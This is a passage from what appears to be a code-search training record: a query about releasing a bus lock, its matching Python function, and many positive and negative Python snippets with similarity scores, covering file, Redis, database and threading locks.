log('Lock acquired')\n return fh", "def lock(self, name, timeout=None, sleep=0.1):\n return Lock(self, name, timeout=timeout, sleep=sleep)", "def acquire(self, blocking=True):\n ops = fcntl.LOCK_EX\n if not blocking:\n ops |= fcntl.LOCK_NB\n fcntl.flock(self.lock_file, ops)", "def acquire_distributed_beat_lock(sender=None, **kwargs):\n scheduler = sender.scheduler\n if not scheduler.lock_key:\n return\n\n logger.debug('beat: Acquiring lock...')\n redis_client = get_redis(scheduler.app)\n\n lock = redis_client.lock(\n scheduler.lock_key,\n timeout=scheduler.lock_timeout,\n sleep=scheduler.max_interval,\n )\n # overwrite redis-py's extend script\n # which will add additional timeout instead of extend to a new timeout\n lock.lua_extend = redis_client.register_script(LUA_EXTEND_TO_SCRIPT)\n lock.acquire()\n logger.info('beat: Acquired lock')\n scheduler.lock = lock", "def lock(*args):", "def waitlock(self, nick, channel, resourcestr):\n return (channel, self._lock(nick, nick, resourcestr, wait=True))", "def lock_config(self) -> 'outputs.LockConfigResponse':\n return pulumi.get(self, \"lock_config\")", "def _volume_lock(self, volume_path):\n return self._lock(self._volume_metadata_path(volume_path))", "def response_lock(self) -> asyncio.Lock:\n return self._response_lock", "def get_lock():\n if not os.path.exists(lock_file):\n fl = open(lock_file, 'a+')\n try:\n fcntl.lockf(fl, fcntl.LOCK_EX | fcntl.LOCK_NB)\n except IOError as e:\n if e.errno not in (errno.EACCES, errno.EAGAIN):\n # Something else started. This is not likely.\n raise(IOError, 'already locked')\n sys.exit(1)\n else:\n fl = open(lock_file, 'r+')\n try:\n fcntl.lockf(fl, fcntl.LOCK_EX | fcntl.LOCK_NB)\n except IOError as e:\n # File is lready locked.\n raise(IOError, 'already locked')\n sys.exit(2)\n return fl", "def lock_control(self):\n raise NotImplementedError('PlatformService: Implementation incomplete')", "def acquire(lockfile, timeout=None):\n\tif timeout is None:\n\t\ttimeout = max_timeout # 100yrs should suffice\n\tretries = int(float(timeout)/wait_interval)\n\n\t_lock_acquire(lockfile, retries)\n\t\n\treturn lockfile", "def thread_lock(self, bay_uuid):\n try:\n self.acquire()\n yield\n except exception.OperationInProgress:\n raise\n except: # noqa\n with excutils.save_and_reraise_exception():\n self.release(bay_uuid)", "def svn_info_t_lock_get(svn_info_t_self): # real signature unknown; restored from __doc__\n pass", "def acquire(self):\r\n self.log('acquire enter')\r\n\r\n start = datetime.now()\r\n\r\n # try and fetch the lock, looping until it's available\r\n while not self.try_acquire():\r\n if (datetime.now() - start).seconds > self.timeout:\r\n raise TimeoutExpired\r\n sleep(0.1)\r\n\r\n self.log('acquire exit')", "def _lock(req): # static method\n tran = req.db.transaction(req.log_info)\n c = tran.cursor()\n c.execute('BEGIN EXCLUSIVE TRANSACTION')\n return c", "def lock_for_update(self):\n return self.lock(True)", "def lock(self, item_type):", "def __enter__(self):\r\n if not self.is_locked:\r\n self.acquire()\r\n return self", "def get(self, block=True, timeout=None):\n if not self.connected:\n raise QueueNotConnectedError(\"Queue is not Connected\")\n\n if block:\n payload = self.__db.brpop(self._key, timeout=timeout)\n else:\n payload = self.__db.rpop(self._key)\n\n if not payload:\n return None\n\n task = self.task_class(payload[1])\n\n # if task was marked as unique then\n # remove the unique_hash from lock table\n if task.unique:\n self.__db.srem(self._lock_key, task.unique_hash())\n\n return task", "def acquire_node(self, node):\n try:\n return node.set(self.resource, self.lock_key, nx=True, px=self.ttl)\n except (redis.exceptions.ConnectionError, redis.exceptions.TimeoutError):\n return False", "def acquire_lock(_uuid, lock_uuid=None, lock_owner=None, db=None, c=None):\n\n try:\n if lock_uuid is None:\n lock_uuid = str(uuid.uuid4())\n\n execute_with_retry(db, c, \"INSERT INTO locks ( uuid, lock_uuid, lock_owner, lock_time ) VALUES ( %s, %s, %s, NOW() )\", \n ( _uuid, lock_uuid, lock_owner ), commit=True)\n\n logging.debug(\"locked {} with {}\".format(_uuid, lock_uuid))\n return lock_uuid\n\n except pymysql.err.IntegrityError as e:\n # if a lock already exists -- make sure it's owned by someone else\n try:\n db.rollback()\n # assume we already own the lock -- this will be true in subsequent calls\n # to acquire the lock\n execute_with_retry(db, c, \"\"\"\nUPDATE locks \nSET \n lock_time = NOW(),\n lock_uuid = %s,\n lock_owner = %s\nWHERE \n uuid = %s \n AND ( lock_uuid = %s OR TIMESTAMPDIFF(SECOND, lock_time, NOW()) >= %s )\n\"\"\", (lock_uuid, lock_owner, _uuid, lock_uuid, saq.LOCK_TIMEOUT_SECONDS))\n db.commit()\n\n c.execute(\"SELECT lock_uuid, lock_owner FROM locks WHERE uuid = %s\", (_uuid,))\n row = c.fetchone()\n if row:\n current_lock_uuid, current_lock_owner = row\n if current_lock_uuid == lock_uuid:\n logging.debug(\"locked {} with {}\".format(_uuid, lock_uuid))\n return lock_uuid\n\n # lock was acquired by someone else\n logging.debug(\"attempt to acquire lock {} failed (already locked by {}: {})\".format(\n _uuid, current_lock_uuid, current_lock_owner))\n\n else:\n # lock was acquired by someone else\n logging.info(\"attempt to acquire lock {} failed\".format(_uuid))\n\n return False\n\n except Exception as e:\n logging.error(\"attempt to acquire lock failed: {}\".format(e))\n report_exception()\n return False\n\n except Exception as e:\n logging.error(\"attempt to acquire lock failed: {}\".format(e))\n report_exception()\n return False", "def acquire_lock(self):\n self._multistore._lock()", "def get_lock(lock_dir=None, **kw):\r\n if lock_dir is None:\r\n lock_dir = os.path.join(config.compiledir, 'lock_dir')\r\n if not hasattr(get_lock, 'n_lock'):\r\n # Initialization.\r\n get_lock.n_lock = 0\r\n if not hasattr(get_lock, 'lock_is_enabled'):\r\n # Enable lock by default.\r\n get_lock.lock_is_enabled = True\r\n get_lock.lock_dir = lock_dir\r\n get_lock.unlocker = Unlocker(get_lock.lock_dir)\r\n else:\r\n if lock_dir != get_lock.lock_dir:\r\n # Compilation directory has changed.\r\n # First ensure all old locks were released.\r\n assert get_lock.n_lock == 0\r\n # Update members for new compilation directory.\r\n get_lock.lock_dir = lock_dir\r\n get_lock.unlocker = Unlocker(get_lock.lock_dir)\r\n\r\n if get_lock.lock_is_enabled:\r\n # Only really try to acquire the lock if we do not have it already.\r\n if get_lock.n_lock == 0:\r\n lock(get_lock.lock_dir, timeout=timeout_before_override, **kw)\r\n atexit.register(Unlocker.unlock, get_lock.unlocker)\r\n # Store time at which the lock was set.\r\n get_lock.start_time = time.time()\r\n else:\r\n # Check whether we need to 'refresh' the lock. We do this every\r\n # 'refresh_every' seconds to ensure noone else tries to override\r\n # our lock after their 'timeout_before_override' timeout period.\r\n now = time.time()\r\n if now - get_lock.start_time > refresh_every:\r\n lockpath = os.path.join(get_lock.lock_dir, 'lock')\r\n _logger.info('Refreshing lock %s', str(lockpath))\r\n refresh_lock(lockpath)\r\n get_lock.start_time = now\r\n get_lock.n_lock += 1", "def pilotLock (self):\n return self.unlock()", "def get(self):\r\n try:\r\n # get with block=False returns an item if one\r\n # is immediately available, else raises the Empty exception\r\n return self._queue.get(block=False)\r\n except queue.Empty:\r\n return self._create_connection()", "def lock(self, writelock=False, nattempts=0):\n return _image.image_lock(self, writelock, nattempts)", "def create_lock(self, resource, **kwargs):\n lock = DistLock(resource=resource, created_by_factory=True, **kwargs)\n lock.redis_nodes = self.redis_nodes\n lock.quorum = self.quorum\n lock.factory = self\n return lock", "def __enter__(self):\n if not self.is_locked:\n self.acquire()\n return self", "def get(self):\n # we use the with-statement here to automatically\n # release the lock when we return\n with self.mutex:\n return self.value", "def get(self):\n with self.__lock:\n while True:\n try:\n job = self.__queue.get(False)\n self.__lock.notify_all()\n return job\n except Queue.Empty:\n self.__lock.wait()", "def get_lock_time():\n pass", "def __call__(self, o):\n if not self.available(o):\n raise ValueError('already locked')\n self._owner = o", "async def async_lock_async(self, device_id, hyper_bridge):\n return await self._async_call_api_op_requires_bridge(\n device_id,\n self._api.async_lock_async,\n self._august_gateway.access_token,\n device_id,\n hyper_bridge,\n )", "def locked(self):\n\t\treturn self.__locked", "def set_lock(self, value):\n act = LockAction(self, value)\n return act.invoke()", "async def test_lock(hass, config_entry, zha_gateway):\n from zigpy.zcl.clusters.closures import DoorLock\n from zigpy.zcl.clusters.general import Basic\n\n # create zigpy device\n zigpy_device = await async_init_zigpy_device(\n hass, [DoorLock.cluster_id, Basic.cluster_id], [], None, zha_gateway)\n\n # load up lock domain\n await hass.config_entries.async_forward_entry_setup(\n config_entry, DOMAIN)\n await hass.async_block_till_done()\n\n cluster = zigpy_device.endpoints.get(1).door_lock\n entity_id = make_entity_id(DOMAIN, zigpy_device, cluster)\n zha_device = zha_gateway.get_device(zigpy_device.ieee)\n\n # test that the lock was created and that it is unavailable\n assert hass.states.get(entity_id).state == STATE_UNAVAILABLE\n\n # allow traffic to flow through the gateway and device\n await async_enable_traffic(hass, zha_gateway, [zha_device])\n\n # test that the state has changed from unavailable to unlocked\n assert hass.states.get(entity_id).state == STATE_UNLOCKED\n\n # set state to locked\n attr = make_attribute(0, 1)\n cluster.handle_message(False, 1, 0x0a, [[attr]])\n await hass.async_block_till_done()\n assert hass.states.get(entity_id).state == STATE_LOCKED\n\n # set state to unlocked\n attr.value.value = 2\n cluster.handle_message(False, 0, 0x0a, [[attr]])\n await hass.async_block_till_done()\n assert hass.states.get(entity_id).state == STATE_UNLOCKED\n\n # lock from HA\n await async_lock(hass, cluster, entity_id)\n\n # unlock from HA\n await async_unlock(hass, cluster, entity_id)", "def get(self, block=True, timeout=None):\n return self.queue.get(block, timeout)", "def acquire_shared_lock(f):\n return _fcntl_with_exception_handling(f, exclusive=False)", "def test_lock_blocks():\r\n with throttle_client(b\"[semaphores]\\nA=1\") as client:\r\n first = client.new_peer(expires_in=timedelta(minutes=1))\r\n second = client.new_peer(expires_in=timedelta(minutes=1))\r\n # Acquire first lock\r\n client.acquire(first, \"A\")\r\n\r\n acquired = False\r\n\r\n def wait_for_second_lock():\r\n nonlocal acquired\r\n acquired = client.acquire(\r\n second, semaphore=\"A\", block_for=timedelta(seconds=2)\r\n )\r\n\r\n t = Thread(target=wait_for_second_lock)\r\n t.start()\r\n client.release(first)\r\n t.join()\r\n # Second lock is no longer pending, because we released first and t is finished\r\n assert acquired", "def lock(self, nick, channel, resourcestr):\n return (channel, self._lock(nick, nick, resourcestr))", "def acquire_lock(self):\n if self.lock:\n self.lock.acquire()", "def locked(self):\n return self.__lock.locked()", "def lock(self, database_name):\n return isempty(self._send_command(database_name, \"lock\"))", "def get_bus(self):\n return self._bus", "def get_device(self, device_id: str) -> Doorbell | Lock | None:\n return self._locks_by_id.get(device_id) or self._doorbells_by_id.get(device_id)", "def acquire(self, blocking=True, timeout=None):\n # pylint:disable=too-many-return-statements,too-many-branches\n # Sadly, the body of this method is rather complicated.\n if self._multithreaded is _UNSET:\n self._multithreaded = self._get_thread_ident()\n elif self._multithreaded != self._get_thread_ident():\n self._multithreaded = _MULTI\n\n # We conceptually now belong to the hub of the thread that\n # called this, whether or not we have to block. Note that we\n # cannot force it to be created yet, because Semaphore is used\n # by importlib.ModuleLock which is used when importing the hub\n # itself! This also checks for cross-thread issues.\n invalid_thread_use = None\n try:\n self._capture_hub(False)\n except InvalidThreadUseError as e:\n # My hub belongs to some other thread. We didn't release the GIL/object lock\n # by raising the exception, so we know this is still true.\n invalid_thread_use = e.args\n e = None\n if not self.counter and blocking:\n # We would need to block. So coordinate with the main hub.\n return self.__acquire_from_other_thread(invalid_thread_use, blocking, timeout)\n\n if self.counter > 0:\n self.counter -= 1\n return True\n\n if not blocking:\n return False\n\n if self._multithreaded is not _MULTI and self.hub is None: # pylint:disable=access-member-before-definition\n self.hub = get_hub() # pylint:disable=attribute-defined-outside-init\n\n if self.hub is None and not invalid_thread_use:\n # Someone else is holding us. There's not a hub here,\n # nor is there a hub in that thread. We'll need to use regular locks.\n # This will be unfair to yet a third thread that tries to use us with greenlets.\n return self.__acquire_from_other_thread(\n (None, None, self._getcurrent(), \"NoHubs\"),\n blocking,\n timeout\n )\n\n # self._wait may drop both the GIL and the _lock_lock.\n # By the time we regain control, both have been reacquired.\n try:\n success = self._wait(timeout)\n except LoopExit as ex:\n args = ex.args\n ex = None\n if self.counter:\n success = True\n else:\n # Avoid using ex.hub property to keep holding the GIL\n if len(args) == 3 and args[1].main_hub:\n # The main hub, meaning the main thread. We probably can do nothing with this.\n raise\n return self.__acquire_from_other_thread(\n (self.hub, get_hub_if_exists(), self._getcurrent(), \"LoopExit\"),\n blocking,\n timeout)\n\n if not success:\n assert timeout is not None\n # Our timer expired.\n return False\n\n # Neither our timer or another one expired, so we blocked until\n # awoke. Therefore, the counter is ours\n assert self.counter > 0, (self.counter, blocking, timeout, success,)\n self.counter -= 1\n return True", "def locked(self):\n return self._locked", "def locked(self):\n return self._locked", "def locked(self):\n return self._locked" ]
[ "0.7457342", "0.7200968", "0.7150414", "0.71146137", "0.6958682", "0.6892568", "0.6885043", "0.6851491", "0.67310303", "0.6696432", "0.66290563", "0.66086996", "0.6608197", "0.66038275", "0.65713847", "0.6433796", "0.6428536", "0.6421543", "0.6370052", "0.63416463", "0.6332135", "0.63242763", "0.63234043", "0.6322086", "0.63195527", "0.6297683", "0.6271662", "0.6257416", "0.62548244", "0.62357706", "0.6226788", "0.62252957", "0.62166804", "0.61986", "0.61889637", "0.6185496", "0.6185301", "0.61668617", "0.6155541", "0.61123437", "0.6079252", "0.60712993", "0.60600823", "0.6023554", "0.59678966", "0.5959646", "0.59514785", "0.5946145", "0.59320986", "0.592095", "0.5879356", "0.58765846", "0.5842161", "0.5840482", "0.5839942", "0.5824486", "0.58041507", "0.58024406", "0.5781267", "0.57792675", "0.5759739", "0.57574075", "0.57538223", "0.5744118", "0.57359177", "0.57297164", "0.5729373", "0.5706011", "0.5703791", "0.5693733", "0.56894565", "0.5676893", "0.5663076", "0.56613326", "0.5658766", "0.5651597", "0.56495416", "0.5645021", "0.5644718", "0.5635979", "0.56324905", "0.5629047", "0.5617995", "0.56080085", "0.5606681", "0.56008357", "0.55962557", "0.55960906", "0.5571993", "0.5557361", "0.55263704", "0.5524007", "0.5523206", "0.55158764", "0.5503025", "0.55019987", "0.54954123", "0.54884344", "0.54884344", "0.54884344" ]
0.569449
69
Release a lock on the bus
def bus_release(self): self._bus_lock.release()
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def release_lock():\r\n get_lock.n_lock -= 1\r\n assert get_lock.n_lock >= 0\r\n # Only really release lock once all lock requests have ended.\r\n if get_lock.lock_is_enabled and get_lock.n_lock == 0:\r\n get_lock.start_time = None\r\n get_lock.unlocker.unlock()", "def release_lock(self):\n if self.lock:\n self.lock.release()", "def release_lock(self):\n self._multistore._unlock()", "def unlock(lock):\n lock.release()", "def release_lock (self):\n\n self.connection.commit ()\n self.locked = False", "def release(self):\n fcntl.flock(self.lock_file, fcntl.LOCK_UN)", "def release(self, o):\n if not self.available(o):\n raise ValueError('you do not own this lock')\n self._owner = None", "def release(self, bay_uuid):\n # Only the conductor that owns the lock will be releasing it.\n result = objects.BayLock.release(bay_uuid, self.conductor_id)\n if result is True:\n LOG.warn(_LW(\"Lock was already released on bay %s!\"), bay_uuid)\n else:\n LOG.debug(\"Conductor %(conductor)s released lock on bay \"\n \"%(bay)s\" % {'conductor': self.conductor_id,\n 'bay': bay_uuid})", "def _release(self):\n try:\n os.unlink(self.lockfile)\n\n # Log success.\n logging.info(\"Released lock at \" + self.lockfile + \"...\")\n except:\n # Ignore all errors.\n pass", "def release_lock():\n lock_file = get_lock_file()\n if exists(lock_file):\n LOG.info('Removing lock file %r' % lock_file)\n os.unlink(lock_file)\n else:\n LOG.warning('Lock file %r did not exist.' % lock_file)", "def release(self):\r\n if self.is_locked:\r\n os.close(self.fd)\r\n os.unlink(self.lockfile)\r\n self.is_locked = False", "def release(self):\n self.is_locked = False\n os.unlink(self.lockfile)", "def release(self):\n if self.is_locked:\n os.close(self.fd)\n os.unlink(self.lockfile)\n self.is_locked = False", "def ReleaseLock(self, lock_data=None):\n if self._acquired_lock is not None:\n if lock_data is not None:\n lock_data = LockData(lock_data)\n\n self._acquired_lock.expire_time = datetime.datetime.min # Force expire.\n self._acquired_lock.lock_data = lock_data\n self._acquired_lock.put()\n else:\n self._acquired_lock.delete()", "def __del__(self):\n if self.is_locked:\n self.release()", "def unlock (self):\n fcntl.flock(self._lockHandle, fcntl.LOCK_UN)\n self._lockHandle.close()", "def unlock(self):\n\n\t\t# Release the file lock first\n\t\tfcntl.lockf(self.lockfile, fcntl.LOCK_UN)\n\t\t# Release the thread lock\n\t\tself.s.release()", "def write_release(self):\n self.is_locked = False\n self.rwlock = RWLock().write_release()", "def unlock(self):\n self.mtx.release()", "def release_node(self, node):\n # use the lua script to release the lock in a safe way\n try:\n node._release_script(keys=[self.resource], args=[self.lock_key])\n except (redis.exceptions.ConnectionError, redis.exceptions.TimeoutError):\n pass", "def _release_imp(self):\n\n self._logger.debug(\n 'Release Lock', lock_name=self._lock_name, caler=self._holder)\n\n try:\n self._dynamodb_wrapper.put_item(\n self._table_name,\n {\n mutex_consts.MutexDynamoConfig.lock.value: self._lock_name,\n mutex_consts.MutexDynamoConfig.holder.value: mutex_consts.NO_HOLDER_DATA,\n mutex_consts.MutexDynamoConfig.ttl.value: 0,\n },\n dynamodb_condition.Condition.is_equal(mutex_consts.MutexDynamoConfig.holder.value, mutex_consts.NO_HOLDER_DATA) |\n dynamodb_condition.Condition.is_equal(mutex_consts.MutexDynamoConfig.holder.value, self._holder) |\n dynamodb_condition.Condition.not_exists(mutex_consts.MutexDynamoConfig.lock.value))\n\n except (dynamodb_exceptions.PutItemConditionException, dynamodb_exceptions.PutItemException):\n self._logger.log_and_raise(\n mutex_exceptions.MutexReleaseFailedException, self._lock_name, self._holder, str(self._ttl))", "def release(self):\n self.filelock.set()\n self.locked = False\n self.exclusive = False", "def release(self):\n self.filelock.set()\n self.locked = False\n self.exclusive = False", "def un_lock(self):\n self._un_lock()", "def api_release(self):\n\n self._api_release_lock_with_timer()", "def _release_lock(self, job_info):\n os.remove(self.lock_file)\n self.logger.debug(\"lock release for '%s'\" % job_info)", "def release_lock(self, lockname, identifier):\n conn = self.conn\n pipe = conn.pipeline(True)\n lockname = \"lock:\" + lockname\n\n while True:\n try:\n pipe.watch(lockname)\n cur_id = pipe.get(lockname)\n if cur_id and cur_id.decode(\"utf-8\") == identifier:\n pipe.multi()\n pipe.delete(lockname)\n pipe.execute()\n return True\n\n pipe.unwatch()\n break\n\n except self.__redis_mod.exceptions.WatchError:\n pass\n\n return False", "def release_lock(self):\n senlin_lock.node_lock_release(self.entity.id, self.id)\n\n # only release cluster lock if it was locked as part of this\n # action (i.e. it's a user intiated action aka CAUSE_RPC from\n # senlin API and a not a CAUSED_DERIVED)\n if self.cause == consts.CAUSE_RPC:\n senlin_lock.cluster_lock_release(self.entity.cluster_id, self.id,\n senlin_lock.NODE_SCOPE)\n return self.RES_OK", "def release_named_lock(self, name):\r\n self.log.debug(\"Releasing named lock (%s)\" % name)\r\n self._named_locks[name].release()", "def unlock_clock(self):\n self.sem.release()", "def test_unblock_immediatly_after_release():\r\n with throttle_client(b\"[semaphores]\\nA=1\") as client:\r\n one = client.new_peer(expires_in=timedelta(minutes=1))\r\n two = client.new_peer(expires_in=timedelta(minutes=1))\r\n # Acquire first lease\r\n client.acquire(one, \"A\")\r\n\r\n # Wait for `two` in a seperate thread so we can use this thread to release `one`\r\n def wait_for_two():\r\n client.acquire(two, \"A\", block_for=timedelta(seconds=15))\r\n\r\n t = Thread(target=wait_for_two)\r\n t.start()\r\n\r\n # Unblock `t`\r\n client.release(one)\r\n\r\n # Three seconds should be ample time for `t` to return\r\n t.join(3)\r\n # If `t` is alive, the join timed out, which should not be the case\r\n assert not t.is_alive()", "def release_lock(fl):\n try:\n fcntl.lockf(fl, fcntl.LOCK_UN)\n except IOError as e:\n sys.exit(3)", "def release(self):\n self.acquired = False", "def release(lockfile):\n\t# Must be called _only_ if the lockfile was successfully obtained\n\tos.unlink(lockfile)", "def release(self) -> None:\n if not self.__monitor.acquire(timeout=self.__timeout):\n raise PetroniaLockTimeoutError()\n if self.__rwlock < 0:\n self.__rwlock = 0\n else:\n self.__rwlock -= 1\n wake_writers = self.__writers_waiting and self.__rwlock == 0\n wake_readers = self.__writers_waiting == 0\n self.__monitor.release()\n if wake_writers:\n self.__writers_ok.acquire()\n self.__writers_ok.notify()\n self.__writers_ok.release()\n elif wake_readers:\n self.__readers_ok.acquire()\n self.__readers_ok.notifyAll()\n self.__readers_ok.release()", "def _api_release_lock_with_timer(self):\n\n if self._apt_timer.is_alive():\n self._apt_timer.cancel()\n\n if self._api_lock.locked():\n self._api_lock.release()", "def unlock(self):\n raise NotImplementedError", "def _unlock(self):\n if self.is_locked():\n self._unlink(self.lockfile)\n self._remove_unique_file()\n self._p(\"Lock removed.\")\n else:\n self._remove_unique_file()", "def release(self):\n try:\n if self.stream_lock and not self.stream_lock.closed:\n unlock(self.stream_lock)\n except Exception:\n pass\n finally:\n BaseRotatingHandler.release(self)", "def release_lock(self):\r\n if self._lock.is_unlocked():\r\n return False\r\n else:\r\n self._lock.release()\r\n self._lock = Lock.unlocked()\r\n return True", "def unlock(self):\n\n self.wait = False", "def release_flock(lockfd):\n if lockfd:\n fcntl.flock(lockfd, fcntl.LOCK_UN)", "def unlock(*args):", "def release(self):\n if not self.is_locked():\n error = NotLocked()\n raise error\n if not self.i_am_locking():\n error = NotMyLock()\n raise error\n remove_existing_pidfile(self.path)", "def netmiko_release(self):\n\n self._netmiko_lock.release()", "def _unlock(self):\n self._lockFile.close()\n os.unlink(self._lockFilename)", "def release(self):\n #关闭文件,删除文件\n if self.fd is not None:\n os.close(self.fd)\n os.unlink(self.lockfile)\n self.is_locked = False\n self.fd = None", "def unlock(self):\n assert self._pa_threaded_mainloop is not None\n # TODO: This is not completely safe. Unlock might be called without lock.\n assert self._lock_count > 0\n self._lock_count -= 1\n pa.pa_threaded_mainloop_unlock(self._pa_threaded_mainloop)", "def _unlock(self):\n self._file.unlock_and_close()\n self._thread_lock.release()", "def __exit__(self, type, value, traceback):\r\n if self.is_locked:\r\n self.release()", "def f_unlock(self):\n self._locked = False", "def _unlock(self, fd):\n fcntl.lockf(fd, fcntl.LOCK_UN)", "def unlock(self) -> None:\n self.__logger.debug('Eva.unlock called')\n return self.__http_client.lock_unlock()", "def release_ticket(self, wid, project):\n\n path = os.path.join(self.prjdir, project)\n q = WorkQueue(path)\n\n head_wi = Workitem(q.head())\n if head_wi.wfid != wid.wfid:\n self.log.info(\"OUCH ... released the wrong lock\")\n\n try:\n next_wid = Workitem(q.next())\n next_wid.result = True\n # Implementation is a bit convoluted but this just sends\n # the WI from the stack to BOSS\n self.send_to_engine(next_wid)\n except QueueEmpty:\n # That's OK, there's nothing waiting\n pass\n wid.result = True", "def unlock(self):\n print(\"DEPRECATED unlock\")\n return self._operations.unlock()", "async def release(self) -> None:\n ...", "async def release(self) -> None:\n ...", "async def release(self) -> None:\n ...", "def demote(self) -> None:\n if not self.__monitor.acquire(timeout=self.__timeout):\n raise PetroniaLockTimeoutError()\n self.__rwlock = 1\n self.__readers_ok.notifyAll()\n self.__monitor.release()", "def read_release(self):\n self.is_locked = False\n self.rwlock = RWLock().read_acquire()", "def _release_listgen_lock(self):\n with self._conn as conn, conn.cursor() as cursor:\n cursor.execute('SELECT pg_advisory_unlock(%s::BIGINT)', [self._lock_key])", "def release(self, exc_type=None, exc_value=None, traceback=None):\n try:\n self.__lock.release()\n except _thread.error:\n if self.__verbose:\n raise", "def release_lock(uuid, lock_uuid, db, c):\n try:\n execute_with_retry(db, c, \"DELETE FROM locks WHERE uuid = %s AND lock_uuid = %s\", (uuid, lock_uuid,))\n db.commit()\n if c.rowcount == 1:\n logging.debug(\"released lock on {}\".format(uuid))\n else:\n logging.warning(\"failed to release lock on {} with lock uuid {}\".format(uuid, lock_uuid))\n\n return c.rowcount == 1\n except Exception as e:\n logging.error(\"unable to release lock {}: {}\".format(uuid, e))\n report_exception()\n\n return False", "def release_play_lock(self) :\n self.play_lock = False", "def release(self):\r\n\r\n if self._lock_fd:\r\n unlock_file(self._lock_fd, close=True)\r\n self._lock_fd = None\r\n return True\r\n else:\r\n return False", "def __exit__(self, type_, value, traceback):\n if self.is_locked:\n self.release()", "async def async_unlock_async(self, device_id, hyper_bridge):\n return await self._async_call_api_op_requires_bridge(\n device_id,\n self._api.async_unlock_async,\n self._august_gateway.access_token,\n device_id,\n hyper_bridge,\n )", "def _release_locks(self):\n self._acquire_event.clear()\n for lock in self._locks[:]:\n try:\n lock.release()\n except KazooException: # pragma: nocover\n # We proceed to remove as many as possible, and leave\n # the ones we couldn't remove\n pass\n else:\n self._locks.remove(lock)", "def unlock(self, nReserved):\n\t\treturn Job(SDK.PrlVm_Unlock(self.handle, nReserved)[0])", "async def async_unlock(self, **kwargs: Any) -> None:\n if not await self._node.secure_unlock():\n raise HomeAssistantError(f\"Unable to unlock device {self._node.address}\")", "def release_event_lock(self) -> bool:\n self.cancel_pending(\"event-lock\")\n self.set_pending(\n \"event-lock\",\n self.do_release_event_lock,\n self.event_lock_delay\n )\n return True", "def release(self) -> DeprecatedAwaitable:\n self._lock.release()\n return DeprecatedAwaitable(self.release)", "def test_remove_lock_unlocked(self):\n try:\n dweepy.remove_lock(test_lock, test_key)\n except dweepy.DweepyError as e:\n self.assertEqual(e.args[0], 'this lock is not in use')", "def do_release_event_lock(self) -> bool:\n self._EventLock = False\n return True", "def unlock(self):\n self.mainloop().unlock()", "def unlock(self, password):\n if self.locked:\n self._privkey = keys.decode_keystore_json(self.keystore, password)\n self.locked = False\n self.address # get address such that it stays accessible after a subsequent lock", "def _release_lock(self, key: Hashable, entry: _LinearizerEntry) -> None:\n logger.debug(\"Releasing linearizer lock %r for key %r\", self.name, key)\n\n # We've finished executing so check if there are any things\n # blocked waiting to execute and start one of them\n entry.count -= 1\n\n if entry.deferreds:\n (next_def, _) = entry.deferreds.popitem(last=False)\n\n # we need to run the next thing in the sentinel context.\n with PreserveLoggingContext():\n next_def.callback(None)\n elif entry.count == 0:\n # We were the last thing for this key: remove it from the\n # map.\n del self.key_to_defer[key]", "def _unlock(self):\n from os import remove\n remove(self.db_path + \".lock\")", "def force_unlock():\r\n global timeout_before_override\r\n timeout_backup = timeout_before_override\r\n timeout_before_override = 0\r\n try:\r\n get_lock(min_wait=0, max_wait=0.001)\r\n release_lock()\r\n finally:\r\n timeout_before_override = timeout_backup", "def delete_lock(self, lock_name):\n path = '/locks/delete/%s' % lock_name\n response = self.rest.request(content_type='text/plain',\n method='delete', path=path)\n return response.ok", "def test_lock_unlock(self):\n my_thing_id = str(uuid.uuid4())\n dweepy.lock(my_thing_id, test_lock, test_key)\n dweepy.unlock(my_thing_id, test_key)", "def release():\n lockfile = path.user('.%s.lock' % application.NAME)\n if isfile(lockfile):\n unlink(lockfile)\n return True\n return False", "def __del__(self):\n\n if self._needs_release:\n send_message(self, \"release\", restype=objc_id, argtypes=[])", "def lock(self):\n self._privkey = None\n self.locked = True", "def release(self):\n if self._tr is not None:\n self._tr.release()", "def lock_stop(self):\n if self.lock_running:\n # print(\"lock_end -> start\")\n self.lock_thread__stop_event.set()\n self.lock_thread.join()\n self.lock_running = False\n\n self.lock_obj.timestamp = self.lock_obj.timestamp - OriginLock.lock_timeout\n self.lock_obj.save()\n # print(\"thread.join()\")", "def freelock(self, nick, channel, resourcestr):\n resources, multi = self.getlocks(resourcestr)\n # iterate over all resources once to check for errors\n for r in resources:\n if not self.locks[r].owner:\n raise LockBotException('ERROR: resource %s is already unlocked' % r,\n resourcestr, self.verb)\n\n # all clear, perform freelock\n msgs = [(channel,\n \"%s: RELEASED, resource%s %s %s free\" %\n (nick,\n 's' if multi else '',\n ', '.join(resources),\n 'are' if multi else 'is',\n ))]\n\n for r in resources:\n l = self.locks[r]\n lockowner = l.owner\n l.owner = ''\n msgs += [(channel,\n \"%s: your lock on %s has been released by %s\" %\n (lockowner, r, nick))]\n assignee = l.popwaiter()\n if assignee:\n msgs += [(channel, self._lock(nick, assignee, r))]\n\n return msgs", "def unlock(self):\n assert self._locked\n\n for interface in (self._if_data, self._if_comm):\n num = interface.bInterfaceNumber\n usb.util.release_interface(self._dev, num)\n try:\n self._dev.attach_kernel_driver(num)\n except NotImplementedError:\n pass\n except usb.core.USBError:\n pass\n self._locked = False", "def unlock(self, tag, index, cas):\n return True", "def unfreeze(self,):\n if self.frozen and self.id_lock.locked():\n self.id_lock.release()\n self.loglocker.release()\n self.frozen = False", "def unlock(self, item_type):", "def release(self, connection):\n with self.lock:\n connection.in_use = False\n self.cond.notify_all()", "def processUnlock(self):\r\n self.controller.executionUnlock()", "def cleanup(self):\r\n # XXX should be fixed properly!!!\r\n try:\r\n self.unlock()\r\n except:\r\n pass", "def test_remove_lock_locked(self):\n my_thing_id = str(uuid.uuid4())\n dweepy.lock(my_thing_id, test_lock, test_key)\n self.assertEqual(dweepy.remove_lock(test_lock, test_key), test_lock)", "def purge(self):\n while self.bus.inWaiting() > 0:\n self.bus.read(self.bus.inWaiting())", "def unlock(self, unconditionally=False):\n islocked = self.locked()\n if not islocked and not unconditionally:\n raise NotLockedError\n # If we owned the lock, remove the global file, relinquishing it.\n if islocked:\n try:\n os.unlink(self.__lockfile)\n except OSError, e:\n if e.errno <> errno.ENOENT: raise\n # Remove our tempfile\n try:\n os.unlink(self.__tmpfname)\n except OSError, e:\n if e.errno <> errno.ENOENT: raise", "def _release_subtask_lock(task_id):\r\n # According to Celery task cookbook, \"Memcache delete is very slow, but we have\r\n # to use it to take advantage of using add() for atomic locking.\"\r\n key = \"subtask-{}\".format(task_id)\r\n cache.delete(key)", "def unlocked():\r\n return Lock(None)", "def unlock(fd):\n 